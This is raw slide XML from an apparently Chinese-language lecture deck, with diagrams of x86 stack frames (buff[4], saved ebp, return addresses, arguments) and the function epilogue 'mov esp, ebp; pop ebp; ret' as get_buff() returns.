          <p:cNvPr id="59401" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="47529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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59402" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="50577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59403" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="53625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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59404" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="56673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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59405" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62928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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59406" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59880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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59407" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="26352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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59408" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="33670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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59409" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="49672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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59410" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5988050"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59411" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="59395" idx="3"/>
            <a:endCxn id="59400" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3092450"/>
            <a:ext cx="1588" cy="1508125"/>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59412" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="44338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9413" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="59578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9414" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="29098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9415" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6597650"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59416" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="59403" idx="3"/>
            <a:endCxn id="59404" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5514975"/>
            <a:ext cx="1588" cy="304800"/>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59417" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1828800"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59418" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="59417" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2324100"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59419" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="59420" idx="3"/>
            <a:endCxn id="59395" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724400" y="3092450"/>
            <a:ext cx="304800" cy="158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9420" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4130675" y="2909888"/>
            <a:ext cx="593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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59421" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="59422" idx="3"/>
            <a:endCxn id="59407" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4708525" y="2787650"/>
            <a:ext cx="320675" cy="158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9422" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="2605088"/>
            <a:ext cx="593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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59423" name="AutoShape 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="609600" y="2057400"/>
            <a:ext cx="304800" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59424" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1828800"/>
            <a:ext cx="593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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a: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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3560705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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>get_buff()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="28638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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="31686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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60421" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="34734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60422" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="37623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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60423" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="40671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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60424" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="43719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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60425" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="46767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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60426" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="49815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60427" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="52863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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60428" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="55911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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60429" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62166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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60430" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59118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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60431" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="25590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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60432" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="32908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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60433" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="48910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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60434" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5911850"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60435" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="60419" idx="3"/>
            <a:endCxn id="60424" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3016250"/>
            <a:ext cx="1588" cy="1508125"/>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60436" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="4357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37" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5881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38" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="2833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39" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6521450"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60440" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="60427" idx="3"/>
            <a:endCxn id="60428" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5438775"/>
            <a:ext cx="1588" cy="304800"/>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60441" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1752600"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60442" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="60441" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2247900"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60443" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="60444" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3886200" y="3016250"/>
            <a:ext cx="320675" cy="158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0444" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3292475" y="2833688"/>
            <a:ext cx="593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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60445" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="320675" y="1919288"/>
            <a:ext cx="593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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60446" name="AutoShape 30"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="609600" y="2286000"/>
            <a:ext cx="304800" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">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60447" name="AutoShape 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="60448" idx="3"/>
            <a:endCxn id="60419" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724400" y="3016250"/>
            <a:ext cx="304800" cy="158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0448" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4130675" y="2833688"/>
            <a:ext cx="593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ebp</a:t>
            </a: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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14451054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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>get_buff()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="28638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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61444" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="31686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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="34734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61446" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="37623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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61447" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
